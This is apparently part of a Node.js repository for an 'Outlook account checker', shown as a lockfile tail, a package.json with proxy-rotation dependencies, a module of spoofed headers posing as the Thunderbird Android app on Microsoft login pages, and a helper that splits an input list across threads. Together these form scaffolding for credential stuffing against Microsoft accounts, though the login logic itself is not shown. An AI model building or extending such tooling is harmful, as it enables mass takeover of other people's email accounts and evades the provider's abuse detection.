"sha512-UcjcJOWknrNkF6PLX83qcHM6KHgVKNkV62Y8a5uYDVv9ydGQVwAHMKqHdJje1VTWpljG0WYpCDhrCdAOYH4TWg==", 1525 | "license": "ISC", 1526 | "engines": { 1527 | "node": ">= 10.x" 1528 | } 1529 | }, 1530 | "node_modules/sprintf-js": { 1531 | "version": "1.1.3", 1532 | "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", 1533 | "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", 1534 | "license": "BSD-3-Clause" 1535 | }, 1536 | "node_modules/sshpk": { 1537 | "version": "1.18.0", 1538 | "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", 1539 | "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", 1540 | "license": "MIT", 1541 | "dependencies": { 1542 | "asn1": "~0.2.3", 1543 | "assert-plus": "^1.0.0", 1544 | "bcrypt-pbkdf": "^1.0.0", 1545 | "dashdash": "^1.12.0", 1546 | "ecc-jsbn": "~0.1.1", 1547 | "getpass": "^0.1.1", 1548 | "jsbn": "~0.1.0", 1549 | "safer-buffer": "^2.0.2", 1550 | "tweetnacl": "~0.14.0" 1551 | }, 1552 | "bin": { 1553 | "sshpk-conv": "bin/sshpk-conv", 1554 | "sshpk-sign": "bin/sshpk-sign", 1555 | "sshpk-verify": "bin/sshpk-verify" 1556 | }, 1557 | "engines": { 1558 | "node": ">=0.10.0" 1559 | } 1560 | }, 1561 | "node_modules/sshpk/node_modules/jsbn": { 1562 | "version": "0.1.1", 1563 | "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", 1564 | "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==", 1565 | "license": "MIT" 1566 | }, 1567 | "node_modules/string_decoder": { 1568 | "version": "0.10.31", 1569 | "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-0.10.31.tgz", 1570 | "integrity": "sha512-ev2QzSzWPYmy9GuqfIVildA4OdcGLeFZQrq5ys6RtiuF+RQQiZWr8TZNyAcuVXyQRYfEO+MsoB/1BuQVhOJuoQ==", 1571 | "license": "MIT" 1572 | }, 1573 | "node_modules/thread-stream": { 1574 | "version": "3.1.0", 1575 | "resolved": "https://registry.npmjs.org/thread-stream/-/thread-stream-3.1.0.tgz", 1576 | "integrity": "sha512-OqyPZ9u96VohAyMfJykzmivOrY2wfMSf3C5TtFJVgN+Hm6aj+voFhlK+kZEIv2FBh1X6Xp3DlnCOfEQ3B2J86A==", 1577 | "license": "MIT", 1578 | "dependencies": { 1579 | "real-require": "^0.2.0" 1580 | } 1581 | }, 1582 | "node_modules/tldts": { 1583 | "version": "6.1.71", 1584 | "resolved": "https://registry.npmjs.org/tldts/-/tldts-6.1.71.tgz", 1585 | "integrity": "sha512-LQIHmHnuzfZgZWAf2HzL83TIIrD8NhhI0DVxqo9/FdOd4ilec+NTNZOlDZf7EwrTNoutccbsHjvWHYXLAtvxjw==", 1586 | "license": "MIT", 1587 | "dependencies": { 1588 | "tldts-core": "^6.1.71" 1589 | }, 1590 | "bin": { 1591 | "tldts": "bin/cli.js" 1592 | } 1593 | }, 1594 | "node_modules/tldts-core": { 1595 | "version": "6.1.71", 1596 | "resolved": "https://registry.npmjs.org/tldts-core/-/tldts-core-6.1.71.tgz", 1597 | "integrity": "sha512-LRbChn2YRpic1KxY+ldL1pGXN/oVvKfCVufwfVzEQdFYNo39uF7AJa/WXdo+gYO7PTvdfkCPCed6Hkvz/kR7jg==", 1598 | "license": "MIT" 1599 | }, 1600 | "node_modules/tough-cookie": { 1601 | "version": "5.1.0", 1602 | "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-5.1.0.tgz", 1603 | "integrity": "sha512-rvZUv+7MoBYTiDmFPBrhL7Ujx9Sk+q9wwm22x8c8T5IJaR+Wsyc7TNxbVxo84kZoRJZZMazowFLqpankBEQrGg==", 1604 | "license": "BSD-3-Clause", 1605 | "dependencies": { 1606 | "tldts": "^6.1.32" 1607 | }, 1608 | "engines": { 1609 | "node": ">=16" 1610 | } 1611 | }, 1612 | "node_modules/tslib": { 1613 | "version": "2.8.1", 1614 | "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", 1615 | "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", 1616 | "license": "0BSD" 1617 | }, 1618 | "node_modules/tunnel": { 1619 | "version": "0.0.6", 1620 | "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", 1621 | "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", 1622 | "license": "MIT", 1623 | "engines": { 1624 | "node": ">=0.6.11 <=0.7.0 || >=0.7.3" 1625 | } 1626 | }, 1627 | "node_modules/tunnel-agent": { 1628 | "version": "0.6.0", 1629 | "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", 1630 | "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", 1631 | "license": "Apache-2.0", 1632 | "dependencies": { 1633 | "safe-buffer": "^5.0.1" 1634 | }, 1635 | "engines": { 1636 | "node": "*" 1637 | } 1638 | }, 1639 | "node_modules/tweetnacl": { 1640 | "version": "0.14.5", 1641 | "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", 1642 | "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==", 1643 | "license": "Unlicense" 1644 | }, 1645 | "node_modules/undici-types": { 1646 | "version": "6.20.0", 1647 | "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", 1648 | "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==" 1649 | }, 1650 | "node_modules/uri-js": { 1651 | "version": "4.4.1", 1652 | "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", 1653 | "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", 1654 | "license": "BSD-2-Clause", 1655 | "dependencies": { 1656 | "punycode": "^2.1.0" 1657 | } 1658 | }, 1659 | "node_modules/utf7": { 1660 | "version": "1.0.2", 1661 | "resolved": "https://registry.npmjs.org/utf7/-/utf7-1.0.2.tgz", 1662 | "integrity": "sha512-qQrPtYLLLl12NF4DrM9CvfkxkYI97xOb5dsnGZHE3teFr0tWiEZ9UdgMPczv24vl708cYMpe6mGXGHrotIp3Bw==", 1663 | "dependencies": { 1664 | "semver": "~5.3.0" 1665 | } 1666 | }, 1667 | "node_modules/uuid": { 1668 | "version": "3.4.0", 1669 | "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", 1670 | "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", 1671 | "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", 1672 | "license": "MIT", 1673 | "bin": { 1674 | "uuid": "bin/uuid" 1675 | } 1676 | }, 1677 | "node_modules/verror": { 1678 | "version": "1.10.0", 1679 | "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", 1680 | "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", 1681 | "engines": [ 1682 | "node >=0.6.0" 1683 | ], 1684 | "license": "MIT", 1685 | "dependencies": { 1686 | "assert-plus": "^1.0.0", 1687 | "core-util-is": "1.0.2", 1688 | "extsprintf": "^1.2.0" 1689 | } 1690 | }, 1691 | "node_modules/verror/node_modules/core-util-is": { 1692 | "version": "1.0.2", 1693 | "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", 1694 | "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==", 1695 | "license": "MIT" 1696 | }, 1697 | "node_modules/wrappy": { 1698 | "version": "1.0.2", 1699 | "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", 1700 | "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" 1701 | } 1702 | } 1703 | } 1704 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "outlook-checker", 3 | "version": "2.0.0", 4 | "description": "Microsoft Outlook Account Checker Tool", 5 | "main": "index.js", 6 | "scripts": { 7 | "start": "node index.js" 8 | }, 9 | "author": "Etherial", 10 | "license": "GPL-3.0-or-later", 11 | "dependencies": { 12 | "async-mutex": "^0.5.0", 13 | "date-fns": "^4.1.0", 14 | "got": "^11.8.6", 15 | "https-proxy-agent": "^7.0.6", 16 | "imap": "^0.8.19", 17 | "imapflow": "^1.0.177", 18 | "request": "^2.88.2", 19 | "socks-proxy-agent": "^8.0.5", 20 | "tough-cookie": "^5.1.0", 21 | "tunnel": "^0.0.6" 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /utils/headers.js: -------------------------------------------------------------------------------- 1 | function header_1() { 2 | return{ 3 | "host": "login.microsoftonline.com", 4 | "connection": "keep-alive", 5 | "sec-ch-ua": "\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"", 6 | "sec-ch-ua-mobile": "?1", 7 | "sec-ch-ua-platform": "\"Android\"", 8 | "upgrade-insecure-requests": "1", 9 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 10 | "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 11 | "sec-fetch-site": "none", 12 | "sec-fetch-mode": "navigate", 13 | "sec-fetch-dest": "document", 14 | "referer": "android-app://net.thunderbird.android/", 15 | "accept-encoding": "gzip, deflate, br", 16 | "accept-language": "en-US,en;q=0.5", 17 | } 18 | } 19 | 20 | function header_2() { 21 | return{ 22 | "host": "login.live.com", 23 | "connection": "keep-alive", 24 | "upgrade-insecure-requests": "1", 25 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 26 | "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 27 | "sec-fetch-site": "none", 28 | "sec-fetch-mode": "navigate", 29 | "sec-fetch-dest": "document", 30 | "sec-ch-ua": "\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"", 31 | "sec-ch-ua-mobile": "?1", 32 | "sec-ch-ua-platform": "\"Android\"", 33 | "sec-ch-ua-platform-version": "\"12.0.0\"", 34 | "referer": "android-app://net.thunderbird.android/", 35 | "accept-encoding": "gzip, deflate, br", 36 | } 37 | } 38 | 39 | function header_3(referer) { 40 | return{ 41 | "host": "login.live.com", 42 | "connection": "keep-alive", 43 | "cache-control": "max-age=0", 44 | "sec-ch-ua": "\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"", 45 | "sec-ch-ua-mobile": "?1", 46 | "sec-ch-ua-platform": "\"Android\"", 47 | "sec-ch-ua-platform-version": "\"12.0.0\"", 48 | "upgrade-insecure-requests": "1", 49 | "origin": "https://login.live.com", 50 | "content-type": "application/x-www-form-urlencoded", 51 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 52 | "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 53 | "sec-fetch-site": "same-origin", 54 | "sec-fetch-mode": "navigate", 55 | "sec-fetch-user": "?1", 56 | "sec-fetch-dest": "document", 57 | "referer": referer, 58 | "accept-encoding": "gzip, deflate, br", 59 | "accept-language": "en-US,en;q=0.5", 60 | } 61 | } 62 | 63 | function header_4() { 64 | return{ 65 | "host": "account.live.com", 66 | "connection": "keep-alive", 67 | "cache-control": "max-age=0", 68 | "sec-ch-ua": "\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"", 69 | "sec-ch-ua-mobile": "?1", 70 | "sec-ch-ua-platform": "\"Android\"", 71 | "upgrade-insecure-requests": "1", 72 | "origin": "https://login.live.com", 73 | "content-type": "application/x-www-form-urlencoded", 74 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 75 | "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 76 | "sec-fetch-site": "same-site", 77 | "sec-fetch-mode": "navigate", 78 | "sec-fetch-dest": "document", 79 | "referer": "https://login.live.com/", 80 | "accept-encoding": "gzip, deflate, br", 81 | "accept-language": "en-US,en;q=0.5", 82 | } 83 | } 84 | 85 | function header_5(referer) { 86 | return{ 87 | "host": "account.live.com", 88 | "connection": "keep-alive", 89 | "cache-control": "max-age=0", 90 | "sec-ch-ua": "\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"", 91 | "sec-ch-ua-mobile": "?1", 92 | "sec-ch-ua-platform": "\"Android\"", 93 | "upgrade-insecure-requests": "1", 94 | "origin": "https://account.live.com", 95 | "content-type": "application/x-www-form-urlencoded", 96 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 97 | "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 98 | "sec-fetch-site": "same-origin", 99 | "sec-fetch-mode": "navigate", 100 | "sec-fetch-user": "?1", 101 | "sec-fetch-dest": "document", 102 | "referer": referer, 103 | "accept-encoding": "gzip, deflate, br", 104 | "accept-language": "en-US,en;q=0.5", 105 | } 106 | } 107 | 108 | function header_6() { 109 | return{ 110 | "host": "login.live.com", 111 | "connection": "keep-alive", 112 | "cache-control": "max-age=0", 113 | "upgrade-insecure-requests": "1", 114 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 115 | "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 116 | "sec-fetch-site": "same-site", 117 | "sec-fetch-mode": "navigate", 118 | "sec-fetch-user": "?1", 119 | "sec-fetch-dest": "document", 120 | "sec-ch-ua": "\".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"", 121 | "sec-ch-ua-mobile": "?1", 122 | "sec-ch-ua-platform": "\"Android\"", 123 | "sec-ch-ua-platform-version": "\"12.0.0\"", 124 | "referer": "https://account.live.com/", 125 | "accept-encoding": "gzip, deflate, br", 126 | "accept-language": "en-US,en;q=0.5", 127 | } 128 | } 129 | 130 | function header_7() { 131 | return{ 132 | "content-type": "application/x-www-form-urlencoded", 133 | "accept": "application/json", 134 | "user-agent": "Mozilla/5.0 (Linux; Android 15; SM-S928B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36", 135 | "host": "login.microsoftonline.com", 136 | "connection": "Keep-Alive", 137 | "accept-encoding": "gzip" 138 | } 139 | } 140 | 141 | 142 | module.exports = { 143 | header_1, 144 | header_2, 145 | header_3, 146 | header_4, 147 | header_5, 148 | header_6, 149 | header_7 150 | } -------------------------------------------------------------------------------- /utils/separator.js: -------------------------------------------------------------------------------- 1 | const fs = require('fs'); 2 | const readline = require('readline'); 3 | 4 | function read_lines(file) { 5 | return new Promise((resolve, reject) => { 6 | const lines = []; 7 | const readStream = fs.createReadStream(file); 8 | const rl = readline.createInterface({ 9 | input: readStream, 10 | crlfDelay: Infinity 11 | }); 12 | 13 | rl.on('line', (line) => { 14 | lines.push(line); 15 | }); 16 | 17 | rl.on('close', () => { 18 | resolve(lines); 19 | }); 20 | 21 | rl.on('error', (err) => { 22 | reject(err); 23 | }); 24 | }); 25 | } 26 | 27 | async function get_sections(file, threads) { 28 | const lines = await read_lines(file); 29 | 30 | let numParts = parseInt(threads, 10); 31 | 32 | if (numParts > lines.length) { 33 | numParts = lines.length; 34 | } 35 | 36 | const partSize = Math.floor(lines.length / numParts); 37 | const remainder = lines.length % numParts; 38 | 39 | const parts = []; 40 | let startIndex = 0; 41 | 42 | for (let i = 0; i < numParts; i++) { 43 | const currentPartSize = partSize + (i < remainder ? 1 : 0); 44 | parts.push(lines.slice(startIndex, startIndex + currentPartSize)); 45 | startIndex += currentPartSize; 46 | } 47 | 48 | const sections = {}; 49 | for (let i = 0; i < parts.length; i++) { 50 | const sectionId = `section_${i + 1}`; 51 | sections[sectionId] = parts[i]; 52 | } 53 | 54 | return sections; 55 | } 56 | 57 | 58 | module.exports = { 59 | get_sections 60 | } --------------------------------------------------------------------------------